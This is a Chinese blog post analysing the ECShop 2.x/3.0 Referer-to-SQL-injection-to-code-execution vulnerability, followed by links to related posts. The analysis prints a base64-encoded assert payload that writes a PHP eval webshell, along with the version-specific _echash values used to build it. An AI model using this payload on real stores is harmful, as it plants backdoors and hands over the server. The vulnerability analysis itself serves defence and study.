ecshop 解密index.php,ECShop 2.x 3.0代码执行漏洞分析

最新推荐文章于 2023-04-11 17:54:09 发布
最新推荐文章于 2023-04-11 17:54:09 发布
阅读量236 收藏
点赞数
文章标签: ecshop 解密index.php

0x00 前言

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。

0x01 漏洞原理

ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的user_passport.dwt模板中,随后insert_mod根据模板内容动态执行相应的函数,用户插入恶意代码导致模板动态执行了lib_insert下的 insert_ads 方法,通过SQL注入,返回构造的执行代码,致使后面调用cls_template模板类的fetch函数,成功执行恶意代码。

0x02 环境搭建

IDE : PHPStorm

PHP: 5.4

ECshop3.0

ECShop 2.7.3

0x03 分析过程

整体功能

首先过一下整体的功能,进入到user.php中。

00eaa7d4151c3062bec91ae16b977b5e.png

正常情况下,程序会将$GLOBALS[‘_SERVER’][‘HTTP_REFERER’] 赋值给了$back_act,接着通过cls_template模板类的assign和display进行赋值和和传值给了user_passport.dwt页面模板;这时候user_passport.dwt页面模板的内容是这样子的。

ba9d9097c3b6f408ca24aa9c149bab77.png

进入到$smarty->display中,通过inser_mod的分割和反序列之后动态调用函数获得购物信息和会员信息,将会默认执行user_passport.dw上面的两个函数,即lib_insert函数类下的insert_cart_info和insert_member_info函数。

user_passport.dw模板:

cd32d4ed7cf9c4c5a96b1d666505828f.png

inser_mod函数:

a1e91b372f00aa143c93c5a599cc1f3d.png

Payload

开始分析

在user.php 中的通过执行登陆操作的时候,将$GLOBALS[‘_SERVER’][‘HTTP_REFERER’]的值修改为我们的代码

68ba95cc20b2c08139c608227bab810f.png

这时候$back_act的值就是我们篡改之后的REFERER值了,之后程序会继续执行:

经过assign,display的赋值和传值之后,这时候user_passport.dwt模板上的back_act值是这样的:

868b1ace84c05d4a73640bd48ea1ab44.png

在观察堆栈参数的时候,可以观察到this->_echash 的值跟我们的Payload的值是一样的,这是ECSHOP的固定的HASH值,2.7版本的_echash值为554fcae493e564ee0dc75bdf2ebf94ca而3.x版本的_echash值为45ea207d7a2b68c49582d2d22adf953,所以所用的Payload也不一样。

ef14b5a2fa855f7224b9f35b975722ac.png

进入到display函数中,会执行fetch函数,获得页面模板内容;

接着按照_echash的值也就是固定hash值进行分割;

771389de8773858aa92e65a3fec447cc.png

分割完之后程序会先执行两个默认函数,然后才执行我们的代码,继续执行insert_mod函数 。

跟进,可以看到我们输入的字符串根据|进行了分割,并分别赋值给了$fun和$para

628b2657bca0caf324605dbe2a74dea0.png

所以最后的到的值类似于$fun = insert_ads $para = array(‘num’=>”*/union…”,’id’=>”*/”)

06c00abd8951998a4f44f419884b7fce.png

到了return $fun($para);这里,将会执行lib_insert动态函数类下的 insert_ads($para)函数。

跟进,可以看到这里执行了SQL语句,而$arr[‘id’]和$arr[‘num’]这两个参数正是我们传进来的数组中的内容,参数可控,从而导致了注入。

ac15950d7dbd1a41d614b88cd0dcdc21.png

这时候在数据库中,执行的语句为:

adf471d608f0d0349117ece38ba497bd.png

可以看到数据库的position_id和position_style字段分别被union select 查询覆盖为了'/*和{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzIucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTExMV0pOyA/Picp'));//}xxx

bf18ad11195a668233c48b30d41d0504.png

查询结束之后,根据$position_style的值执行了cls_template模板类的fetch函数。

跟进,看到这里,这里最终执行了恶意代码。

看一下内部的字符串处理,传入filename的值为:

然后使用substr对filenname进行切割,接着进入到$this->fetch_str中,可以看到fetch_str函数的返回内容为<?php echo xx>格式的。

64582fc8fcfeaf50fb406b1f7f7b8838.png

在跟入到$this->get_val中,执行了$p = $this->make_var($val);,跟入到make_var函数中。

2adc755e6610314d7aa86287466449a7.png

字符串处理最后返回的值为:

拼接在一起,最后返回的数据为:

从而最终导致了代码执行。

01e01a644657611969b9f14548d3d69c.png

0x04 代码执行的调用链

0a5fcd29d5ea02dc079fd6e9ce09138d.png

0x05 修复方案

在ECShop3.6版本中insert_ads函数对$arr[‘num’]和$arr[‘id’]进行了强制类型转换。

作者:斗象能力中心TCC-t-bag

浩彬老撕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞,...
ecshop商务平台兼容PHP5.6.X的完整安装包
11-23
由于自PHP5.4以后发布的版本去掉了部分原有的旧函数,导致 EcShop2.7.3 电子商务平台在 PHP5.4.X 以上安装失败。这里提供了专门针对PHP5.4.x以后版本的完整安装包,直接安装,一键成功。
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞
最新发布
m0_46699477的博客
04-11 1281
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1379
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2054
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
ThinkPHP 5.0 * 远程代码执行漏洞分析
热门推荐
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
ecshop 解密index.php,PHP-威盾PHP加密专家解密算法
weixin_42613017的博客
03-11 265
/************************************威盾PHP加密专家解密算法 By:Neeao*http://Neeao.com*2009-09-10***********************************/$filename=”shared.php”;//要解密的文件$lines = file($filename);//0,1,2行//第一次base64解密...
EC.rar_ecshop_php解密
09-23
解密后的代码更容易遭受黑客攻击,因此在解密和修改后,必须确保代码的安全性,例如修复已知漏洞,防止SQL注入和XSS攻击等。 6. **版本控制与更新**:在进行解密和修改ECShop源码时,应使用版本控制系统(如Git)来...
ECshop修改教程.doc
05-14
ECshop 修改教程 ...7. 安装 Discuz,访问 http://68ecshop.com/ 本教程指导用户如何修改 ECshop 实现特定的功能,包括首页精品、新品、热销展示、去版权与标志、后台部分设置和 ECshop 整合论坛等。
仿易迅网ecshop免费模板.zip源码ECSHOP网站模板打包下载
03-12
仿易迅网ecshop免费模板.zip源码ECSHOP网站模板打包下载仿易迅网ecshop免费模板.zip源码ECSHOP网站模板打包下载 1.适合个人搭建网站参考 2.适合学生毕业设计搭建网站参考 3.适合小公司搭建网站参考
通达 oa 2010 php代码 解密
11-03
通达OA2010版本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,版权归原公司所有)
php本地解密,PHPDecode 在线解密工具
weixin_42117267的博客
03-21 3425
诈尸水一篇博文。8月份写的一个解密加密PHP源码的工具( http://d.poetn.cc:7727/),打算小范围使用。刚好最近看到 PwnHub 上有个解密的题目,p神微博上吐槽居然有人花钱解密了,2333 那分享一波另类解密思路吧。从 WebShell 混淆说起经常跟 WebShell 打交道的朋友会比较清楚,最觉见的 WebShell 是这样的:1然后这种 Shell 很容易就会被静态查...
bo-blog index.php include任意php文件漏洞
06-19 1300
文章作者:我非我[F.S.T]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注意:本文首发火狐技术联盟(www.wrsky.com) 并由火狐成员我非我友情提交到邪恶八进制信息安全团队这就是我渗透八进制的漏洞。官方已发补丁。漏洞发现日期:2005.6.13漏洞涉及版本:Bo-Blog Version 漏洞分析及利用:刚发现bo-blog的一个致命的漏洞。我是看1.7.009
PHP漏洞全解
04-15 971
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
渗透测试-地基篇-Webshell-Ecshop框架(六)
qq_34801745的博客
11-25 934
** 渗透测试-地基篇-Webshell-Ecshop框架(六) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定
ecshop user.php怎么注入,ECSHOP 常见注入漏洞分析和修复方法
weixin_26706567的博客
03-11 518
优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。1.测试版本v2.7.3 RELEASE 20121106(最新)v2.7.3 RELEASE 201204112.漏洞条件需登录到后台3.漏洞利用1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_...
ecshop爆路径的方法之一 - 漏洞发布 京华志
浓缩精华 方成志 京华志
09-13 857
编辑器暴物理漏洞 includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php 可结合其他漏洞使用 www.jinghuaz

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值